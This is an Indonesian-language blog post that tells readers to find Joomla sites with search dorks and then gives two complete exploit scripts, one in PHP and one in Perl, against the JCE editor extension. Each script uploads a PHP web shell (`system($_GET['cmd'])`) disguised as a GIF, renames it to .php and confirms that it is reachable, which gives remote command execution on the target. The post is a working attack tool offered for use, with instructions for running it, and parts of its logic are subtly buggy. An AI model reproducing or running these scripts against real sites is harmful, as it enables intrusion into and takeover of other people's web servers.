gunakan otak kalian untuk mencari . gunakan dork lain untuk mencari website yang berCMS joomla
menggunakan dua bahasa program PHP dan Perl
versi PHP : save as dengan ekstensi *.php
<?php
######################################### www.bugreport.ir ########################################
#
# iraq - h4ck Group
#
#
# Title: (Auto Shell Uploader in joomla) V0.1 - PHP Version Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: iraqi h4ck
###################################################################################################
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
<p></font><font color="#00ff00" > hostname
(ex:www.sitename.com): </font><input name="host"
size="20"> <span class="Stile5"><font
color="#FF0000">*</span></p>
<p></font><font color="#00ff00" > path (ex:
/joomla/ or just / ): </font><input name="path"
size="20"> <span class="Stile5"><font
color="#FF0000">*</span></p>
<p></font><font color="#00ff00" >Please
specify a file to upload: </font><input type="file"
name="datafile" size="40"><font color="#FF0000"> *
</font>
<p><font color="#00ff00" > specify a port
(default is 80): </font><input name="port"
size="20"><span class="Stile5"></span></p>
<p><font color="#00ff00" > Proxy
(ip:port): </font><input
name="proxy" size="20"><span
class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font
color="#FF0000">* </font><font color="white" >fields are
required</font></font></span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
$ock = fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>';
die;
}
} else
{
$parts = explode(':',$proxy);
echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
$ock = fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo '<font color=white>No response from proxy...<br></font>';
die;
}
}
fputs($ock,$packet);
if ($response == 1)
{
if ($proxy == '')
{
$html = '';
while (!feof($ock))
{
$html .= fgets($ock);
}
} else
{
$html = '';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .= fread($ock,1);
}
}
} else $html = '';
fclose($ock);
if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str =
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
foreach ($str as $value){
$pos = strpos($res, $value);
if ($pos === false) {
$count=$count++;
} else {
echo "<font color=white>Target patched.<br/><br/></font>";
die();
}
}
if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>';
}
}
$host = $_POST['host'];
$path = $_POST['path'];
$port = $_POST['port'];
$proxy = $_POST['proxy'];
if (isset($_POST['Submit']) && $host != '' && $path != '')
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{die('<font color=white>Error... check the path!</font>');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
/* Packet 1 --> Checking Exploitability */
$packet = "GET
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,1);
/* Packet 2 --> Uploading shell as a gif file */
$content = "GIF89a1\n";
$content .= file_get_contents($_FILES['datafile']['tmp_name']);
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet = "POST
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie:
6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743;
jce_imgmanager_dir=%2F;
__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;
__utmb=216871948.1.10.1317632284; __utmc=216871948;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\
n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
$packet .= $data;
sendpacket($packet,0,0,0);
/* Packet 3 --> Change Extension from .gif to .php */
$packet = "POST
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie:
__utma=216871948.2116932307.1317632284.1317639575.1317734968.3;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=216871948.20.10.1317734968; __utmc=216871948;
jce_imgmanager_dir=%2F;
6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
$packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
$packet .= $ren."\r\n\r\n";
sendpacket($packet,1,0,0);
/* Packet 4 --> Check for successfully uploaded */
$packet = "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') != true)
{echo "<font color=white>Exploit Faild...</font>";} else
echo "<font color=white>Exploit
Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
versi Perl : save as dengan ekstensi *.pl
buka cmd > cd Desktop > jce.pl (jika file berada di desktop)
untuk windows download dulu program perl DISINI
untuk linux langsung jalanin aja
scriptnya :
Code:
#!perl/usr/bin
######################################### www.bugreport.ir ########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: iraqi h4ck
###################################################################################################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: iraqi h4ck (admin[@]0-Day[dot]net) ||||\n\n";
print "\t+--> Usage: perl $0 <host> <--+\n";
print "\t+--> Example: perl $0 localhost <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: iraqi h4ck (admin[@]0-Day[dot]net) ||||\n\n";
$TARGET = $ARGV[0];
$PORT = "80";
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL = "/images/stories/0day.php?cmd=";
$HTTP = "http://";
$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
HTTP/1.1";
$header1P2 = "POST
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "<? system($_GET['cmd']);exit; ?>";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";
############################################### Packet 1 --> Checking
Exploitability
#########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr =
("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
while (($count!=10) && ($die != 1)) {
foreach $arr(@arr){
if ($simplePage =~ m/$arr/) {
print "\n[*] Target patched.\n\n";
$die = 1;
} else {
$count++;
}
}
}
if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 -->
Uploading shell as a gif file
#########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote
"$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$head
er8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$heade
r6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header
18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change
Extension from .gif to .php
#########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check
for successfully uploaded
#########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}
# 7C4643B34954D553 1337day.com [2013-06-26] EEEAFCBC0C7B0F73 #
Tidak ada komentar:
Posting Komentar